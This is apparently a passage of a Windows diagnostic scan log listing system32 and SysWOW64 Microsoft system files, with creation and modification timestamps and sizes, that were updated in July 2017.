2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 07:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 06:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 06:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-07-11 20:53 - 2017-07-07 09:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-11 20:53 - 2017-07-07 09:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-07-11 20:53 - 2017-07-07 09:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-11 20:53 - 2017-07-07 09:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-11 20:53 - 2017-07-07 08:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-07-11 20:53 - 2017-07-07 08:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-07-11 20:53 - 2017-07-07 08:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-07-11 20:53 - 2017-07-07 08:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-07-11 20:53 - 2017-07-07 08:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-11 20:53 - 2017-06-20 08:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-11 20:53 - 2017-06-20 08:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-11 20:53 - 2017-06-20 08:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-11 20:53 - 2017-06-20 07:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-11 20:53 - 2017-06-20 07:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
